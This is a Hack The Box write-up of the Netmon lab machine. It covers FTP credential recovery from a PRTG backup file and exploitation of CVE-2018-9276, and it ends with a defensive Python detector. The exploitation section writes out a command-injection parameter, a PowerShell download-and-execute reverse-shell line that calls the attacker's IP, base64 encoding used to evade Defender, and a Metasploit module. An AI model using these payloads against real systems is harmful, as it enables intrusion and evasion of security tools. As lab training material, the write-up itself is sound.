HTB: Netmon [Easy]
Netmon is an Easy Windows box featuring PRTG Network Monitor. Initial access gained through anonymous FTP, revealing sensitive configuration files. Credentials recovered from backup files enabled authenticated access to PRTG. Exploited CVE-2018-9276 for RCE via the notification system, achieving SYSTEM-level access.
Reconnaissance
Nmap Scan
Command used:
nmap -Pn -sCV -v -oA nmap/netmon 10.129.230.176
Scan Results
# Nmap 7.98 scan initiated Mon Jan 19 11:50:36 2026 as: /usr/lib/nmap/nmap --privileged -Pn -sCV -v -oA nmap/netmon 10.129.230.176
Nmap scan report for 10.129.230.176
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-19T03:50:51
|_ start_date: 2026-01-19T03:29:52
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 19 11:50:58 2026 -- 1 IP address (1 host up) scanned in 21.72 seconds
Key Findings
- FTP (21): Anonymous login enabled with full C:\ drive access
- HTTP (80): PRTG Network Monitor v18.1.37.13946
- SMB (139/445): Windows file sharing enabled
- WinRM (5985): Remote management available
Initial Foothold
FTP Enumeration
Anonymous FTP access granted full filesystem browsing. The user flag was retrieved from C:\Users\Public\user.txt. Further enumeration against a reference list of sensitive Windows files yielded little else.
HTTP Service Analysis
The web interface presented a login prompt. Attempted default credentials including:
- admin:pass
- admin:admin
- prtgadmin:prtgadmin
SMB Enumeration
Attempted SMB enumeration using standard tools:
enum4linux -a 10.129.230.176
smbclient -L //10.129.230.176
smbmap -H 10.129.230.176
No accessible shares found without valid credentials. SMB enumeration yielded no significant findings at this stage.
All authentication attempts failed. Research revealed CVE-2018-9276 for this PRTG version, requiring authenticated access.
Credential Extraction
Command used against the PRTG Configuration.old.bak backup file retrieved over FTP:
grep -B5 -A5 -i password PRTG\ Configuration.old.bak | sed 's/ //g' | sort -u
Extracted credentials snippet:
<proxyport>
PrTg@dmin2018
PRTGSystemAdministrator
<retrysnmp>
<!--User:prtgadmin-->
</wbemprotocol>
Initial login attempt with prtgadmin:PrTg@dmin2018 failed.
Password Pattern Analysis
Examining file timestamps in C:\ProgramData\Paessler\PRTG Network Monitor\, the backup file was dated 07-14-2018, while active configuration files showed 2019 dates.
Hypothesized year-based password increment policy. Updated credentials:
prtgadmin:PrTg@dmin2018 → prtgadmin:PrTg@dmin2019
Authenticated successfully!
Exploitation
CVE-2018-9276 - Authenticated RCE
Upon successful authentication, gained access to the PRTG System Administrator Dashboard.
Research identified CVE-2018-9276 affecting PRTG version 18.1.37.13946, enabling authenticated RCE through the notification system’s Program Execution feature.
Exploitation Steps
Navigated to: Setup → Account Settings → Notifications
Selected Execute Program notification type:
Configuration:
- Program File: Demo exe notification - outfile.ps1
- Parameter: test | ping -n 1 10.10.14.27
RCE Verification
Started tcpdump listener for ICMP packets:
sudo tcpdump -i tun0 icmp
Triggered notification and confirmed ICMP packets received, verifying command execution.
Reverse Shell 1 (Failed)
Used Invoke-PowerShellTcp.ps1 from Nishang.
Setup:
# Start web server
python3 -m http.server 80
# Start listener
nc -lvnp 4444
Payload:
test | powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.27:80/reverse.ps1')"
Result: Failed. Windows Defender flagged and blocked the script execution.
Reverse Shell 2 (Success)
Solution: Base64 encode the PowerShell script to evade AV detection.
Encoding command:
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w 0 | xclip -selection clipboard
Note: xclip -selection clipboard automatically copies the output to the clipboard for easy pasting.
Final payload:
test | powershell -enc BASE64_ENCODED_PAYLOAD
Successfully obtained reverse shell as NT AUTHORITY\SYSTEM. Both user and root flags retrieved.
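As an added defender-side example (not part of the original writeup), the following Python helper audits a PRTG "Execute Program" notification parameter for the two tricks used on this box: the shell metacharacters appended to the parameter in the Exploitation Steps, and the UTF-16LE/base64 `-enc` payload from Reverse Shell 2, which it decodes so the underlying script can be reviewed. The parameter strings and the encoded script are constructed samples, and the `-enc` alias list is an assumption about which PowerShell abbreviations to look for.

```python
import base64
import re
from typing import Optional

# Added example (not from the writeup): audit PRTG "Execute Program"
# notification parameters for the two tricks seen on this box.
SHELL_META = re.compile(r"[|&;`]|\$\(")  # cmd/PowerShell command chaining
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_powershell_enc(blob: str) -> Optional[str]:
    """Decode a `powershell -enc` argument: base64 over UTF-16LE text.

    Returns None when the blob is not valid base64 or not valid UTF-16LE.
    """
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_parameter(param: str) -> dict:
    """Return findings for one notification parameter string."""
    findings = {"shell_metachar": bool(SHELL_META.search(param)),
                "decoded_script": None}
    m = ENC_ARG.search(param)
    if m:
        findings["decoded_script"] = decode_powershell_enc(m.group(1))
    return findings


# Constructed samples: a benign parameter, the writeup's ping injection,
# and an -enc payload built the same way as `iconv -t UTF-16LE | base64`.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_PARAMS = {
    "benign": "test",
    "pipe_injection": "test | ping -n 1 10.10.14.27",
    "encoded": f"test | powershell -enc {SAMPLE_ENC}",
}

if __name__ == "__main__":
    for name, param in SAMPLE_PARAMS.items():
        print(name, analyze_parameter(param))
```

The same two checks apply to the command line of any process spawned by the PRTG service in endpoint telemetry, not only to the notification configuration itself.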
Alternative Methods
Metasploit module available for automated exploitation:
use exploit/windows/http/prtg_authenticated_rce